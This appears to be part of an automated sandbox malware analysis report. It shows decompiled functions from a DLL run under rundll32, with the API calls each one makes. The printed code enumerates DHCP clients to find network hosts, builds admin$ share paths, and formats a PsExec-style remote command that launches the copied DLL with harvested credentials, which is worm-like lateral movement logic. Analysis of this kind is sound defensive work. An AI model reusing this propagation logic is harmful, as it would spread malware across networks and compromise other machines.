				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
				_t58 =  &_v584;
				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
				if(_t58 != 0) {
					L15:
					return 0;
				}
				_t61 =  *_v12;
				_v60 = _t61;
				if(_t61 <= 0) {
					L14:
					__imp__DhcpRpcFreeMemory(_v12);
					goto L15;
				} else {
					goto L2;
				}
				do {
					L2:
					_t64 =  *((intOrPtr*)(_v12 + 4));
					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
						_t71 =  *((intOrPtr*)(_v12 + 4));
						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
						if(_t71 != 0) {
							goto L13;
						}
						_t73 =  *_v16;
						_v52 = _t73;
						if(_t73 == 0 || _t88 >= _t73) {
							L12:
							__imp__DhcpRpcFreeMemory(_v16);
							goto L13;
						} else {
							do {
								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
								if(_t89 != 0) {
									_push( *_t89);
									_t85 = __imp__#14;
									if(E011EA3D9( *_t85()) != 0) {
										__imp__#12( *_t85( *_t89));
										_t86 = E011E6916(_t78);
										if(_t86 != 0) {
											E011E6FC7(_t79, 0, _a4);
											HeapFree(GetProcessHeap(), 0, _t86);
										}
									}
								}
								_t88 = _v24 + 1;
								_v24 = _t88;
							} while (_t88 < _v52);
							goto L12;
						}
					}
					L13:
					_t83 = _v28 + 1;
					_v28 = _t83;
				} while (_t83 < _v60);
				goto L14;
			}





























    0x011e90a3
    0x011e90a5
    0x011e90a9
    0x011e90ac
    0x011e90af
    0x011e90b2
    0x011e90b5
    0x011e90b8
    0x011e90bb
    0x011e90be
    0x011e90c1
    0x011e90c4
    0x011e90c7
    0x011e90ca
    0x011e90d1
    0x011e90ec
    0x011e90f3
    0x011e90fb
    0x011e91f3
    0x011e91f7
    0x011e91f7
    0x011e9104
    0x011e9106
    0x011e910b
    0x011e91e8
    0x011e91eb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e9111
    0x011e9111
    0x011e9118
    0x011e911f
    0x011e9127
    0x011e9151
    0x011e9158
    0x011e9160
    0x00000000
    0x00000000
    0x011e9165
    0x011e9167
    0x011e916c
    0x011e91cf
    0x011e91d2
    0x00000000
    0x011e9172
    0x011e9172
    0x011e9178
    0x011e917d
    0x011e917f
    0x011e9181
    0x011e9191
    0x011e9198
    0x011e91a4
    0x011e91a8
    0x011e91af
    0x011e91bd
    0x011e91bd
    0x011e91a8
    0x011e9191
    0x011e91c6
    0x011e91c7
    0x011e91ca
    0x00000000
    0x011e9172
    0x011e916c
    0x011e91d8
    0x011e91db
    0x011e91dc
    0x011e91df
    0x00000000

    APIs
    • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73389263,00000000), ref: 011E90D1
    • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 011E90F3
    • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 011E911F
    • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 011E9158
    • htonl.WS2_32(00000000), ref: 011E9187
    • htonl.WS2_32(00000000), ref: 011E9195
    • inet_ntoa.WS2_32(00000000), ref: 011E9198
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
      • Part of subcall function 011E6916: GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
      • Part of subcall function 011E6916: HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 011E91B6
    • HeapFree.KERNEL32(00000000), ref: 011E91BD
    • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 011E91D2
    • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 011E91EB
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6CE7, Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 96
    C-Code - Quality: 100%
    			E011E6CE7(void* _a4, void* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t45;
				void* _t50;
				intOrPtr* _t53;
				void* _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t73;
				void* _t74;

				_t32 =  *0x11ff108; // 0x2e6710
				_v8 = _v8 & 0x00000000;
				_v12 = _t32;
				_t33 = _a4;
				_t67 = _t33 + 2;
				do {
					_t71 =  *_t33;
					_t33 = _t33 + 2;
				} while (_t71 != 0);
				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
				_v20 = _t38;
				if(_t38 != 0) {
					_t40 = _a4;
					_t72 = _t40 + 2;
					do {
						_t68 =  *_t40;
						_t40 = _t40 + 2;
					} while (_t68 != 0);
					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
					_t45 = _a8;
					_t69 = _t45 + 2;
					do {
						_t73 =  *_t45;
						_t45 = _t45 + 2;
					} while (_t73 != 0);
					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
					_v16 = _t50;
					if(_t50 != 0) {
						_t53 = _a8;
						_t74 = _t53 + 2;
						do {
							_t70 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t70 != 0);
						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
						_v8 = E011E724D(_v12, 0, _t70,  &_v20);
						HeapFree(GetProcessHeap(), 0, _v16);
					}
					HeapFree(GetProcessHeap(), 0, _v20);
				}
				return _v8;
			}























    0x011e6ced
    0x011e6cf2
    0x011e6cf6
    0x011e6cf9
    0x011e6cfc
    0x011e6cff
    0x011e6cff
    0x011e6d02
    0x011e6d05
    0x011e6d26
    0x011e6d28
    0x011e6d2d
    0x011e6d33
    0x011e6d36
    0x011e6d39
    0x011e6d39
    0x011e6d3c
    0x011e6d3f
    0x011e6d53
    0x011e6d58
    0x011e6d5e
    0x011e6d61
    0x011e6d61
    0x011e6d64
    0x011e6d67
    0x011e6d7b
    0x011e6d83
    0x011e6d88
    0x011e6d8a
    0x011e6d8d
    0x011e6d90
    0x011e6d90
    0x011e6d93
    0x011e6d96
    0x011e6daa
    0x011e6dc3
    0x011e6dca
    0x011e6dca
    0x011e6dd4
    0x011e6dd6
    0x011e6ddd

    APIs
    • GetProcessHeap.KERNEL32(00000008,?,767C423D,00000000,?,?,?), ref: 011E6D1D
    • HeapAlloc.KERNEL32(00000000), ref: 011E6D26
    • memcpy.MSVCRT ref: 011E6D53
    • GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 011E6D78
    • HeapAlloc.KERNEL32(00000000), ref: 011E6D7B
    • memcpy.MSVCRT ref: 011E6DAA
      • Part of subcall function 011E724D: EnterCriticalSection.KERNEL32(?,76E6C570,76E6FE8D,?,?,011E6DC0,?), ref: 011E725C
      • Part of subcall function 011E724D: LeaveCriticalSection.KERNEL32(?,011E6DC0,?,?,?,011E6DC0,?), ref: 011E728A
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 011E6DC7
    • HeapFree.KERNEL32(00000000), ref: 011E6DCA
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E6DD1
    • HeapFree.KERNEL32(00000000), ref: 011E6DD4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E97A5, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 90
    C-Code - Quality: 100%
    			E011E97A5(WCHAR* __ebx, WCHAR* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v532;
				void _v16916;
				signed short* _t26;
				void* _t36;
				WCHAR* _t41;
				void* _t43;
				signed short* _t44;
				signed int _t47;
				signed short _t48;
				void* _t50;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				signed short* _t56;
				WCHAR* _t57;

				_t41 = __ebx;
				E011EA4F0(0x4210);
				_t57 = __ecx;
				 *__ebx = 0;
				 *((short*)(__ecx)) = 0;
				_t52 = 0;
				_v12 = 0;
				E011E8B70( &_v532);
				_t26 =  *0x11ff100; // 0x1442a10
				_v8 = _v8 & 0;
				if(_t26 == 0) {
					_v8 = 3;
				} else {
					_t44 = _t26;
					_t5 =  &(_t44[1]); // 0x1442a12
					_t56 = _t5;
					do {
						_t48 =  *_t44;
						_t44 =  &(_t44[1]);
					} while (_t48 != 0);
					_t52 = _t44 - _t56 >> 1;
					if(_t52 > 0x104) {
						_v8 = 0x7a;
					} else {
						_t50 = _t57 - _t26;
						do {
							_t47 =  *_t26 & 0x0000ffff;
							 *(_t50 + _t26) = _t47;
							_t26 =  &(_t26[1]);
						} while (_t47 != 0);
					}
				}
				SetLastError(_v8);
				if(_t52 == 0 || PathFileExistsW(_t57) == 0) {
					 *_t41 = 0;
					 *_t57 = 0;
				} else {
					_t54 = wsprintfW(_t41, L"%s \\\\%s -accepteula -s ", _t57, _a4);
					_t55 = _t54 + wsprintfW( &(_t41[_t54]), L"-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 ",  &_v532);
					_t15 = E011E6BB0( &_v16916) + 1; // 0x1
					_t43 = _t15;
					_t36 = 0x1fff;
					if(_t43 <= 0x1fff) {
						_t36 = _t43;
					}
					memcpy( &(_t41[_t55]),  &_v16916, _t36 + _t36);
					_v12 = 1;
				}
				return _v12;
			}




















    0x011e97a5
    0x011e97ad
    0x011e97b5
    0x011e97b7
    0x011e97bb
    0x011e97c4
    0x011e97c7
    0x011e97ca
    0x011e97cf
    0x011e97d4
    0x011e97d9
    0x011e9817
    0x011e97db
    0x011e97db
    0x011e97dd
    0x011e97dd
    0x011e97e0
    0x011e97e0
    0x011e97e3
    0x011e97e6
    0x011e97ef
    0x011e97f7
    0x011e980e
    0x011e97f9
    0x011e97fb
    0x011e97fd
    0x011e97fd
    0x011e9800
    0x011e9804
    0x011e9807
    0x011e980c
    0x011e97f7
    0x011e9821
    0x011e9829
    0x011e989c
    0x011e989f
    0x011e9836
    0x011e9848
    0x011e985c
    0x011e986d
    0x011e986d
    0x011e9870
    0x011e9877
    0x011e9879
    0x011e9879
    0x011e9889
    0x011e9891
    0x011e9891
    0x011e98a8

    APIs
      • Part of subcall function 011E8B70: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E8B80
    • SetLastError.KERNEL32(00000003,?,00000001,767C423D,?,011E9BEB,?), ref: 011E9821
    • PathFileExistsW.SHLWAPI ref: 011E982C
    • wsprintfW.USER32 ref: 011E9846
    • wsprintfW.USER32 ref: 011E985A
      • Part of subcall function 011E6BB0: wsprintfW.USER32 ref: 011E6BD3
      • Part of subcall function 011E6BB0: EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,?), ref: 011E6C4C
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
      • Part of subcall function 011E6BB0: SetLastError.KERNEL32(0000007A), ref: 011E6C5A
      • Part of subcall function 011E6BB0: LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
    • memcpy.MSVCRT ref: 011E9889
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7298, Relevance: 13.8, APIs: 11, Instructions: 95
    C-Code - Quality: 95%
    			E011E7298(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __esi;
				void* _t51;
				void* _t54;
				void* _t56;
				signed int _t57;
				void* _t72;
				struct _CRITICAL_SECTION* _t82;

				_t67 = __ecx;
				_push(__ecx);
				_t82 = _a4;
				_v8 = 0;
				if(_t82 == 0 || _a8 == 0) {
					L11:
					return _v8;
				} else {
					EnterCriticalSection(_t82);
					if(E011E71D6(0, _t67, _t82, _a8, 0) == 0) {
						_t68 =  *(_t82 + 0x20);
						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
							if(_t51 != 0) {
								 *(_t82 + 0x18) = _t51;
								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
								_v8 = E011E7298(_t68, _t82, _a8, _a12);
							}
						} else {
							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
							if(_t54 != 0) {
								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
								_t57 =  *(_t82 + 0x24);
								_t72 =  *(_t82 + 0x18);
								if(_t56 == 0) {
									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
								} else {
									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
									_v8 = 1;
								}
							}
						}
					}
					LeaveCriticalSection(_t82);
					goto L11;
				}
			}











    0x011e7298
    0x011e729b
    0x011e729d
    0x011e72a3
    0x011e72a8
    0x011e73a5
    0x011e73ab
    0x011e72b7
    0x011e72b9
    0x011e72cc
    0x011e72d5
    0x011e72da
    0x011e737a
    0x011e7382
    0x011e7387
    0x011e738d
    0x011e739a
    0x011e739a
    0x011e72e0
    0x011e72f3
    0x011e72fb
    0x011e7300
    0x011e730e
    0x011e7319
    0x011e731d
    0x011e7320
    0x011e7323
    0x011e735b
    0x011e7325
    0x011e732b
    0x011e733f
    0x011e7347
    0x011e734a
    0x011e734a
    0x011e7323
    0x011e7300
    0x011e72da
    0x011e739e
    0x00000000
    0x011e73a4

    APIs
    • EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,011E6FFB,00000001,?,00000000), ref: 011E72B9
      • Part of subcall function 011E71D6: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,011E72CA,00000001,00000000,?,011E6FFB,00000001,?), ref: 011E71E7
      • Part of subcall function 011E71D6: LeaveCriticalSection.KERNEL32(?,?,?,011E72CA,00000001,00000000,?,011E6FFB,00000001,?), ref: 011E723E
    • GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E7373
    • HeapReAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E737A
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72EA
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72F3
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,011E6FFB,00000001,?,00000000), ref: 011E730B
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E730E
      • Part of subcall function 011E7298: memcpy.MSVCRT ref: 011E733F
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000000,?,?,011E6FFB,00000001,?,00000000), ref: 011E7358
      • Part of subcall function 011E7298: HeapFree.KERNEL32(00000000,?,011E6FFB), ref: 011E735B
    • LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E739E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6DE0, Relevance: 12.6, APIs: 10, Instructions: 97
    C-Code - Quality: 100%
    			E011E6DE0(void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t31;
				void* _t36;
				intOrPtr* _t38;
				intOrPtr* _t43;
				void* _t48;
				intOrPtr* _t51;
				long _t57;
				intOrPtr _t61;
				void* _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t69;
				void* _t70;

				_t31 = _a4;
				_v8 = _v8 & 0x00000000;
				_t61 =  *0x11ff108; // 0x2e6710
				_t63 = _t31 + 2;
				do {
					_t67 =  *_t31;
					_t31 = _t31 + 2;
				} while (_t67 != 0);
				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
				_v16 = _t36;
				if(_t36 != 0) {
					_t38 = _a4;
					_t68 = _t38 + 2;
					do {
						_t64 =  *_t38;
						_t38 = _t38 + 2;
					} while (_t64 != 0);
					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
					_t43 = _a8;
					_t65 = _t43 + 2;
					do {
						_t69 =  *_t43;
						_t43 = _t43 + 2;
					} while (_t69 != 0);
					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
					_v12 = _t48;
					if(_t48 == 0) {
						L12:
						HeapFree(GetProcessHeap(), 0, _v16);
					} else {
						_t51 = _a8;
						_t70 = _t51 + 2;
						do {
							_t66 =  *_t51;
							_t51 = _t51 + 2;
						} while (_t66 != 0);
						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
						_t57 = E011E7298(_t66, _t61,  &_v16, _a12);
						_v8 = _t57;
						if(_t57 == 0) {
							HeapFree(GetProcessHeap(), _t57, _v12);
							goto L12;
						}
					}
				}
				return _v8;
			}






















    0x011e6de6
    0x011e6de9
    0x011e6dee
    0x011e6df6
    0x011e6df9
    0x011e6df9
    0x011e6dfc
    0x011e6dff
    0x011e6e1e
    0x011e6e20
    0x011e6e25
    0x011e6e2b
    0x011e6e2e
    0x011e6e31
    0x011e6e31
    0x011e6e34
    0x011e6e37
    0x011e6e4b
    0x011e6e50
    0x011e6e56
    0x011e6e59
    0x011e6e59
    0x011e6e5c
    0x011e6e5f
    0x011e6e72
    0x011e6e7a
    0x011e6e7f
    0x011e6ec6
    0x011e6ece
    0x011e6e81
    0x011e6e81
    0x011e6e84
    0x011e6e87
    0x011e6e87
    0x011e6e8a
    0x011e6e8d
    0x011e6ea1
    0x011e6eb1
    0x011e6eb6
    0x011e6ebb
    0x011e6ec4
    0x00000000
    0x011e6ec4
    0x011e6ebb
    0x011e6e7f
    0x011e6ed7

    APIs
    • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
    • HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
    • memcpy.MSVCRT ref: 011E6E4B
    • GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
    • HeapAlloc.KERNEL32(00000000), ref: 011E6E72
    • memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E7298: EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,011E6FFB,00000001,?,00000000), ref: 011E72B9
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72EA
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72F3
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,011E6FFB,00000001,?,00000000), ref: 011E730B
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E730E
      • Part of subcall function 011E7298: memcpy.MSVCRT ref: 011E733F
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000000,?,?,011E6FFB,00000001,?,00000000), ref: 011E7358
      • Part of subcall function 011E7298: HeapFree.KERNEL32(00000000,?,011E6FFB), ref: 011E735B
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E7373
      • Part of subcall function 011E7298: HeapReAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E737A
      • Part of subcall function 011E7298: LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E739E
    • GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
    • HeapFree.KERNEL32(00000000), ref: 011E6EC4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
    • HeapFree.KERNEL32(00000000), ref: 011E6ECE
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6BB0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66
    C-Code - Quality: 100%
    			E011E6BB0(WCHAR* _a4) {
				short _v2052;
				void* _t9;
				intOrPtr* _t12;
				WCHAR* _t15;
				WCHAR* _t19;
				intOrPtr _t26;
				short _t27;
				void* _t30;
				short* _t31;
				signed int _t33;
				signed int _t36;

				_t9 = E011E6973();
				if(_t9 < 0xa) {
					_t9 = 0xa;
				}
				wsprintfW( &_v2052, L"%d", _t9);
				_t12 =  &_v2052;
				_t30 = _t12 + 2;
				do {
					_t26 =  *_t12;
					_t12 = _t12 + 2;
				} while (_t26 != 0);
				_t36 = _t12 - _t30 >> 1;
				EnterCriticalSection(0x11ff124);
				_t43 =  *0x11f6010;
				if( *0x11f6010 != 0) {
					E011E6AF0(_t43);
				}
				_t15 = 0x11fb110;
				_t4 =  &(_t15[1]); // 0x11fb112
				_t31 = _t4;
				do {
					_t27 =  *_t15;
					_t15 =  &(_t15[1]);
				} while (_t27 != 0);
				_t33 = (_t15 - _t31 >> 1) + _t36;
				if(_t33 >= 0x1ffe) {
					SetLastError(0x7a);
				} else {
					_t19 = _a4;
					 *_t19 = 0;
					StrCatW(_t19,  &_v2052);
					StrCatW(_a4, 0x11fb110);
					_t36 = _t33;
				}
				LeaveCriticalSection(0x11ff124);
				return _t36;
			}














    0x011e6bb9
    0x011e6bc1
    0x011e6bc5
    0x011e6bc5
    0x011e6bd3
    0x011e6bd9
    0x011e6be2
    0x011e6be5
    0x011e6be5
    0x011e6be8
    0x011e6beb
    0x011e6bfc
    0x011e6bfe
    0x011e6c04
    0x011e6c0b
    0x011e6c0d
    0x011e6c0d
    0x011e6c17
    0x011e6c19
    0x011e6c19
    0x011e6c1c
    0x011e6c1c
    0x011e6c1f
    0x011e6c22
    0x011e6c2b
    0x011e6c34
    0x011e6c5a
    0x011e6c36
    0x011e6c36
    0x011e6c41
    0x011e6c4c
    0x011e6c52
    0x011e6c54
    0x011e6c54
    0x011e6c65
    0x011e6c71

    APIs
      • Part of subcall function 011E6973: GetTickCount.KERNEL32(011E84FC), ref: 011E6973
    • wsprintfW.USER32 ref: 011E6BD3
    • EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
    • LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
      • Part of subcall function 011E6AF0: wsprintfW.USER32 ref: 011E6B36
      • Part of subcall function 011E6AF0: StrCatW.SHLWAPI(011FB110,?), ref: 011E6B6E
      • Part of subcall function 011E6AF0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E6B90
      • Part of subcall function 011E6AF0: HeapFree.KERNEL32(00000000), ref: 011E6B97
    • StrCatW.SHLWAPI(?,?), ref: 011E6C4C
    • StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
    • SetLastError.KERNEL32(0000007A), ref: 011E6C5A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6AF0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
    C-Code - Quality: 100%
    			E011E6AF0(void* __eflags) {
				signed int _v8;
				short _v2056;
				void* __ebx;
				void* __esi;
				intOrPtr* _t21;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				signed int _t33;
				signed int _t35;
				intOrPtr _t36;
				void* _t37;

				 *0x11fb110 = 0;
				_t33 = 0;
				_v8 = 0;
				_t30 = E011E711F(1,  &_v8);
				if(_t30 != 0) {
					do {
						wsprintfW( &_v2056, L" \"%ws:%ws\"",  *((intOrPtr*)( *_v8)),  *((intOrPtr*)( *_v8 + 4)));
						_t21 =  &_v2056;
						_t37 = _t37 + 0x10;
						_t31 = _t21 + 2;
						do {
							_t32 =  *_t21;
							_t21 = _t21 + 2;
						} while (_t32 != 0);
						_t35 = (_t21 - _t31 >> 1) + _t33;
						if(_t35 < 0x1ff5) {
							goto L4;
						}
						break;
						L4:
						StrCatW(0x11fb110,  &_v2056);
						_v8 = _v8 & 0x00000000;
						_t33 = _t35;
						_t36 =  *0x11ff108; // 0x2e6710
					} while (E011E7167(_t30, _t36,  &_v8) != 0);
					HeapFree(GetProcessHeap(), 0, _t30);
				}
				 *0x11f6010 =  *0x11f6010 & 0;
				 *0x11ff0f8 = 0;
				return 0;
			}















    0x011e6b04
    0x011e6b0e
    0x011e6b12
    0x011e6b1a
    0x011e6b1e
    0x011e6b20
    0x011e6b36
    0x011e6b3c
    0x011e6b42
    0x011e6b45
    0x011e6b48
    0x011e6b48
    0x011e6b4b
    0x011e6b4e
    0x011e6b57
    0x011e6b60
    0x00000000
    0x00000000
    0x00000000
    0x011e6b62
    0x011e6b6e
    0x011e6b74
    0x011e6b7b
    0x011e6b7d
    0x011e6b89
    0x011e6b97
    0x011e6b97
    0x011e6ba0
    0x011e6ba7
    0x011e6baf

    APIs
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000008,00000008,00000000,76E6C426,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E712E
      • Part of subcall function 011E711F: HeapAlloc.KERNEL32(00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7131
      • Part of subcall function 011E711F: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7156
      • Part of subcall function 011E711F: HeapFree.KERNEL32(00000000,?,011E6B1A), ref: 011E7159
    • wsprintfW.USER32 ref: 011E6B36
    • StrCatW.SHLWAPI(011FB110,?), ref: 011E6B6E
      • Part of subcall function 011E7167: EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
